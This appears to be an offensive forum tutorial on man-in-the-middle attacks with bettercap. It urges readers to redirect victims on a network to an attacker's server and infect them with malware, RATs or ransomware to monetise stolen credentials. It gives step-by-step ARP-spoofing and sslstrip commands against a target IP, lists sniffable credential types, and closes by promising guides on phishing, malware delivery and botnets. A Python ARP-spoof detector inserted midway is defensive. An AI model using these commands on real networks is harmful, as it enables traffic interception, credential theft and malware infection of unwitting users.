Sniffing HTTPS and trying to find credentials all day on a network is dead, so don't focus too much on it; you are very late, this isn't the 2010s. Capturing any type of useful data in the present day and age is not going to happen in a timely fashion. We know our limitations with MiTM attacks against HTTP (no website uses this protocol anymore), HTTPS, and HSTS, so your ultimate goal should be redirecting everyone on the network to your web server and infecting them with malware, a RAT, or ransomware. Don't try to capture credentials over the wire. That isn't happening. Besides, depending on what type of ransomware or malware you infect them with, you'll be able to siphon their account credentials and monetize that data accordingly.
Prerequisites:
- An attacker computer running a Kali VM, booted directly from USB, or as the host OS.
- A separate computer to act as the target (updated Windows or macOS preferably).
- Attacker and target computer connected to the same home network as you, with internet connectivity.
- Bettercap (https://www.bettercap.org). This is the most modern tool in use today and has so many improvements over Ettercap that most modern attackers/professionals use it for their engagements.
Bettercap can sniff:
- URLs being visited.
- HTTPS hosts being visited.
- HTTP POSTed data.
- HTTP Basic and Digest authentications.
- HTTP cookies.
- FTP credentials.
- IRC credentials.
- POP, IMAP and SMTP credentials.
- NTLMv1/v2 (HTTP, SMB, LDAP, etc.) credentials.
- DICT protocol credentials.
- MPD credentials.
- NNTP credentials.
- DH***** messages and authentication.
- REDIS login credentials.
- RLOGIN credentials.
- SNPP credentials.
METHOD:
My example target computer's IP is 192.168.100.1

In Kali, open up a new terminal window and type the following:

    sudo bettercap
    net.probe on

Wait 30 seconds for it to discover network hosts.

    net.probe off
    net.show

This will show you the targets on the network. Pay attention to your target IP.

    set https.proxy.sslstrip true
    set net.sniff.verbose false
    set arp.spoof.targets TARGET_IP

MY EXAMPLE: set arp.spoof.targets 192.168.100.1

    set arp.spoof.internal true
    net.sniff on
    https.proxy on
    arp.spoof on
On your target computer open a web browser with a "New Private Window" and visit: https://senglehardt.com/demo/no_boundaries/loginmanager
Which browser you're using will dictate the HTTPS errors displayed to you. These are the warnings that users are presented with when a MiTM attack is happening against them. Go ahead and click "Advanced" or similar to click through the warnings and visit: https://senglehardt.com/demo/no_boundaries/loginmanager
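To see the same attack from the defender's side, here is an added example (not from the original post and not bettercap's code) that scans tcpdump-style ARP reply lines, constructed here rather than captured, for the two signatures that arp.spoof with arp.spoof.internal true leaves on the wire: an IP whose MAC changes mid-capture, and a single MAC answering for both the gateway and the target. The gateway address 192.168.100.254 and all MACs are assumed sample values.

```python
"""Flag ARP spoofing from tcpdump-style 'ARP, Reply X is-at MAC' lines."""
import re
from collections import defaultdict

# Constructed sample capture (not real traffic). 192.168.100.254 is the
# gateway, 192.168.100.1 the target from the post. From 12:00:05 a third
# MAC (...:99) answers for BOTH addresses, the footprint of arp.spoof.internal.
SAMPLE_ARP_LOG = """\
12:00:01 ARP, Reply 192.168.100.254 is-at 00:11:22:33:44:01, length 28
12:00:02 ARP, Reply 192.168.100.1 is-at 00:11:22:33:44:02, length 28
12:00:03 ARP, Reply 192.168.100.7 is-at 00:11:22:33:44:07, length 28
12:00:05 ARP, Reply 192.168.100.254 is-at 00:11:22:33:44:99, length 28
12:00:05 ARP, Reply 192.168.100.1 is-at 00:11:22:33:44:99, length 28
12:00:06 ARP, Reply 192.168.100.254 is-at 00:11:22:33:44:99, length 28
"""

ARP_REPLY = re.compile(r"ARP, Reply (\S+) is-at ([0-9a-fA-F:]{17})")


def parse_arp_replies(text):
    """Yield (ip, mac) for every ARP reply line; other lines are ignored."""
    for line in text.splitlines():
        m = ARP_REPLY.search(line)
        if m:
            yield m.group(1), m.group(2).lower()


def detect_arp_spoof(text, gateway_ip=None):
    """Return findings: 'ip_flips' (IP announced with >1 MAC, in order seen),
    'mac_claims' (one MAC answering for >1 IP; a router with several
    addresses can do this legitimately, so treat it as a lead, not proof),
    and 'gateway_changed' (the gateway's MAC changed during the capture)."""
    macs_for_ip = defaultdict(list)
    ips_for_mac = defaultdict(set)
    for ip, mac in parse_arp_replies(text):
        if not macs_for_ip[ip] or macs_for_ip[ip][-1] != mac:
            macs_for_ip[ip].append(mac)          # record MAC changes only
        ips_for_mac[mac].add(ip)
    return {
        "ip_flips": {ip: m for ip, m in macs_for_ip.items() if len(set(m)) > 1},
        "mac_claims": {m: sorted(i) for m, i in ips_for_mac.items() if len(i) > 1},
        "gateway_changed": gateway_ip is not None
        and len(set(macs_for_ip.get(gateway_ip, []))) > 1,
    }


if __name__ == "__main__":
    for key, val in detect_arp_spoof(SAMPLE_ARP_LOG, "192.168.100.254").items():
        print(key, val)
```

Feed it `tcpdump -n -e arp` output from a monitoring host and alert on any non-empty finding; a static ARP entry for the gateway or Dynamic ARP Inspection on the switch is the corresponding mitigation.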
Alright, I'll be writing ASAP about how you can get the users to your shady website to deliver some malware or set up a phishing login page, or infect some devices in the network to use them as botnets or inject RATs, and all that.